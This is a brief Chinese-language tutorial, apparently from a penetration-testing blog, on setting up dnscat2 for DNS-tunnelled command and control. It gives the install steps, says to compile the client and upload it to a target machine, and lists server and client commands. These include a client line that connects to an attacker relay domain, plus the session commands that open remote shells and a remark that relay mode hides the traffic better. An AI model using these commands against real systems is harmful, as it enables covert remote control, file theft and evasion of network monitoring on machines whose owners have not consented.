dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell
目录
[解决bundle instal1特别慢问题](#解决bundle instal1特别慢问题)
客户端编译(在同一个服务端vps下编译好dnscat,上传目标机搞)
[DNS中级模式 (带上挂中载的命令,其余和直连一样,不过流量更好混淆)](#DNS中级模式 (带上挂中载的命令,其余和直连一样,不过流量更好混淆))
Dnscat2安装
apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler
git clone https://gitee.com/yijingsec/dnscat2.git
cd dnscat2/server
bundle install
解决bundle instal1特别慢问题
vim Gemfile #打开这个配置文件
source 'https://gems.ruby-china.com' #修改配置
客户端编译(在同一个服务端vps下编译好dnscat,上传目标机搞)
git clone https://gitee.com/yijingsec/dnscat2.git
cd dnscat2/client/
make
dnscat下载下来上传目标机
DNS直连模式
开启服务端
ruby ./dnscat2.rb
服务端会显示连接的命令,只需带上vps的ip进行执行即可
基本命令使用
获取shell:
windows #相当于msf的sessions
session -i 1
shell
session -i 2
back #放后台
DNS直连流量展示
DNS中级模式 (带上挂中载的命令,其余和直连一样,不过流量更好混淆)
服务端启动
ruby ./dnscat2.rb nc1.peiqi.fake.top --secret=crazy #--secret=crazy密码设置,nc1.peiqi.fake.top挂的中继
客户端启动
dnscat也是和直连模式一样获取的
./dnscat --secret=crazy nc1.peiqi.fake.top